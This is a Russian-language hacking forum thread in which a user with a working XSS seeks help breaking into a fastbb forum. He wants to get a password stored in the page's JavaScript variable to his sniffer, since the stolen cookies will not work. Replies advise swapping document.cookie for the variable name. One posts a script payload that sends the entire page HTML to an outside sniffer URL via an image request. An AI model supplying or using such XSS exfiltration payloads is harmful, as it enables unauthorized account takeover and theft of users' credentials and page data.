Есть рабочая xss. Такой вопрос: можно ли передать на сниффер фрагмент самой страницы, её html-кода?

или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..

Лан, я просто плохо объяснил....извините...короч� � проблема вот в чём...
нужно взломать fastbb, позарез. Такая параша, но очень необходимо.
Короче куки на сниффер приходят, но они ужасной кодировки...не подставляются, то ли привязка там к чему-то стоит. Не знаю, если не получится то что я придумал, тогда буду пробовать дальше. А придумал я то что там пароль на странице хранится в открытом виде(в html виде => var pass). И я подумал нельзя ли пересылать его снифферу? Вот решил спросить у вас...

передаются Referer, Query [куки], Agent и все..А ты уверен??
Просто сниффер не логирует\показывает.
Например порт браузера,порт сервера ну и кучу другой не нужной информации,хотя кому-то может и нужной...

И я подумал нельзя ли пересылать его снифферу? Я в ждавескрипте ничерта не смыслю :)
Вместо document.cookie поставь название переменной...
зы не забываем про репутацию

qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)
Чесно говоря уже задолбали Повышайте мне репутацию! после этой новой системы...

Всё разрешилось, темку можно закрывать.

qBiN, в данный момент речь идет об ачатовском снифферее,а соответственно он показывает только то что я перечислил... да и не будет же он показывать ХТМЛ код, это же глупо не так ли??
BaH, это уже другой разговор...помоему надо пхп скрипт подделать который будет принимать значения формы var_pass а в пхп я 0 =)


Сниффер может показывать все что угодно. Вернее все что вы на него передадите.
Например вот так можно переслать на сниффер всю HTML страницу:

<script>i=new Image(); i.src="http://antichat.ru/cgi-bin/s.jpg?"+document.documentElement.innerHTML;</script>

или я тебя не понял или ты сам не знаешь чего написал=))))
передаются Referer, Query [куки], Agent и все..

Мне кажется это ты не хнаешь что написал!!! )

Почему ты написал Query [куки]?!!!

<script>i=new Image(); i.src="http://antichat.ru/cgi-bin/s.jpg?"+document.documentElement.innerHTML;</script>
это я не понял, если кто-то прикольнеться так и напишет, то всю страницу лога сниффера, будет занимать чьята долбанная html страница? =))))

Мне кажется это ты не хнаешь что написал!!! )

Почему ты написал Query [куки]?!!!

Просто в строке Query выводятся куки )))

Сниффер может показывать все что угодно. Вернее все что вы на него передадите.
Например вот так можно переслать на сниффер всю HTML страницу:

Но форум же не ХТМЛ, а ПХП ))) Или это значения не имеет???

А какая разница? Браузеру же хтмл передается, а не пхп =))

Просто Algol написал< что передаётся ХТМЛ страница, а не ХТМЛ код =)

так, из чего состоит хтмл страница?
правильно, из хтмл кода =))
тогда какая разница что передаеца?

Ну... не знаю...
Если бы задал вопрос наоборот )))
Х.З. вообщем )))
Поживём увидим )))

не понял чо вы спорите, передаеться код, который преобразуеться в страницу.
мда, пошол ка я изучать джаву скрипт, вещь оказываеться полезная.
наскока мне известно, что ява скрипт работать с файлами не умеет, значит передать хакеру тект какого либо файла жертвы не может, так? или я ошибаюсь?